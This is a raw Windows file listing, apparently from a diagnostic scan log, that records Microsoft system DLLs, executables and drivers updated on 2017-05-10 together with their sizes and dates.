2017-05-10 15:56 - 2017-04-28 03:11 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 01460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:36 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2017-05-10 15:56 - 2017-04-28 02:36 - 03945192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2017-05-10 15:56 - 2017-04-28 02:34 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:19 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2017-05-10 15:56 - 2017-04-28 02:19 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2017-05-10 15:56 - 2017-04-28 02:19 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2017-05-10 15:56 - 2017-04-28 02:18 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2017-05-10 15:56 - 2017-04-28 02:15 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2017-05-10 15:56 - 2017-04-28 02:14 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2017-05-10 15:56 - 2017-04-28 02:12 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2017-05-10 15:56 - 2017-04-28 02:11 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2017-05-10 15:56 - 2017-04-28 02:11 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2017-05-10 15:56 - 2017-04-28 02:11 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2017-05-10 15:56 - 2017-04-28 02:10 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2017-05-10 15:56 - 2017-04-28 02:10 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2017-05-10 15:56 - 2017-04-28 02:08 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2017-05-10 15:56 - 2017-04-28 02:08 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2017-05-10 15:56 - 2017-04-28 02:08 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2017-05-10 15:56 - 2017-04-28 02:08 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2017-05-10 15:56 - 2017-04-28 02:07 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2017-05-10 15:56 - 2017-04-28 02:07 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:07 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:07 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:07 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2017-05-10 15:56 - 2017-04-26 16:59 - 03220992 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-05-10 15:56 - 2017-04-21 17:34 - 01133568 _____ (Microsoft Corporation) C:\Windows\system32\cdosys.dll
2017-05-10 15:56 - 2017-04-21 17:15 - 00805376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cdosys.dll
2017-05-10 15:56 - 2017-04-20 02:00 - 00394448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-05-10 15:56 - 2017-04-20 01:16 - 00346320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2017-05-10 15:56 - 2017-04-17 17:37 - 02065408 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2017-05-10 15:56 - 2017-04-17 17:37 - 00876544 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2017-05-10 15:56 - 2017-04-17 17:37 - 00512000 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2017-05-10 15:56 - 2017-04-17 17:37 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\oleres.dll
2017-05-10 15:56 - 2017-04-17 17:37 - 00008704 _____ (Microsoft Corporation) C:\Windows\system32\comcat.dll
2017-05-10 15:56 - 2017-04-17 17:12 - 01417728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2017-05-10 15:56 - 2017-04-17 17:12 - 00581632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2017-05-10 15:56 - 2017-04-17 17:12 - 00026112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleres.dll
2017-05-10 15:56 - 2017-04-17 16:54 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comcat.dll
2017-05-10 15:56 - 2017-04-16 11:17 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2017-05-10 15:56 - 2017-04-16 11:16 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2017-05-10 15:56 - 2017-04-16 10:57 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2017-05-10 15:56 - 2017-04-16 10:55 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2017-05-10 15:56 - 2017-04-16 10:55 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2017-05-10 15:56 - 2017-04-16 10:54 - 00576512 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-05-10 15:56 - 2017-04-16 10:54 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-05-10 15:56 - 2017-04-16 10:51 - 02899456 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-05-10 15:56 - 2017-04-16 10:44 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2017-05-10 15:56 - 2017-04-16 10:43 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2017-05-10 15:56 - 2017-04-16 10:38 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2017-05-10 15:56 - 2017-04-16 10:37 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2017-05-10 15:56 - 2017-04-16 10:37 - 00116224 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-05-10 15:56 - 2017-04-16 10:36 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-05-10 15:56 - 2017-04-16 10:36 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2017-05-10 15:56 - 2017-04-16 10:35 - 25741312 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-05-10 15:56 - 2017-04-16 10:25 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2017-05-10 15:56 - 2017-04-16 10:21 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2017-05-10 15:56 - 2017-04-16 10:19 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2017-05-10 15:56 - 2017-04-16 10:18 - 05977600 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-05-10 15:56 - 2017-04-16 10:11 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2017-05-10 15:56 - 2017-04-16 10:10 - 00087552 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2017-05-10 15:56 - 2017-04-16 10:09 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2017-05-10 15:56 - 2017-04-16 10:04 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2017-05-10 15:56 - 2017-04-16 10:03 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-05-10 15:56 - 2017-04-16 10:02 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2017-05-10 15:56 - 2017-04-16 10:01 - 00499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2017-05-10 15:56 - 2017-04-16 10:01 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2017-05-10 15:56 - 2017-04-16 10:01 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2017-05-10 15:56 - 2017-04-16 10:00 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-05-10 15:56 - 2017-04-16 10:00 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2017-05-10 15:56 - 2017-04-16 09:57 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2017-05-10 15:56 - 2017-04-16 09:53 - 02290176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2017-05-10 15:56 - 2017-04-16 09:52 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2017-05-10 15:56 - 2017-04-16 09:52 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2017-05-10 15:56 - 2017-04-16 09:49 - 20278272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2017-05-10 15:56 - 2017-04-16 09:48 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2017-05-10 15:56 - 2017-04-16 09:47 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2017-05-10 15:56 - 2017-04-16 09:47 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2017-05-10 15:56 - 2017-04-16 09:46 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2017-05-10 15:56 - 2017-04-16 09:43 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-05-10 15:56 - 2017-04-16 09:40 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-05-10 15:56 - 2017-04-16 09:40 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-05-10 15:56 - 2017-04-16 09:37 - 02132992 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-05-10 15:56 - 2017-04-16 09:37 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2017-05-10 15:56 - 2017-04-16 09:35 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2017-05-10 15:56 - 2017-04-16 09:30 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2017-05-10 15:56 - 2017-04-16 09:29 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2017-05-10 15:56 - 2017-04-16 09:28 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2017-05-10 15:56 - 2017-04-16 09:25 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2017-05-10 15:56 - 2017-04-16 09:24 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2017-05-10 15:56 - 2017-04-16 09:22 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2017-05-10 15:56 - 2017-04-16 09:20 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2017-05-10 15:56 - 2017-04-16 09:12 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2017-05-10 15:56 - 2017-04-16 09:10 - 15250944 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-05-10 15:56 - 2017-04-16 09:10 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2017-05-10 15:56 - 2017-04-16 09:08 - 04548608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2017-05-10 15:56 - 2017-04-16 09:08 - 02057216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2017-05-10 15:56 - 2017-04-16 09:08 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2017-05-10 15:56 - 2017-04-16 09:04 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-05-10 15:56 - 2017-04-16 08:53 - 13661184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2017-05-10 15:56 - 2017-04-16 08:50 - 01544704 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-05-10 15:56 - 2017-04-16 08:40 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-05-10 15:56 - 2017-04-16 08:37 - 02767872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2017-05-10 15:56 - 2017-04-16 08:34 - 01314816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2017-05-10 15:56 - 2017-04-16 08:34 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2017-05-10 15:56 - 2017-04-12 17:32 - 01483776 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2017-05-10 15:56 - 2017-04-12 17:32 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2017-05-10 15:56 - 2017-04-12 17:32 - 00190976 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2017-05-10 15:56 - 2017-04-12 17:32 - 00141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2017-05-10 15:56 - 2017-04-12 17:26 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2017-05-10 15:56 - 2017-04-12 17:25 - 01176064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
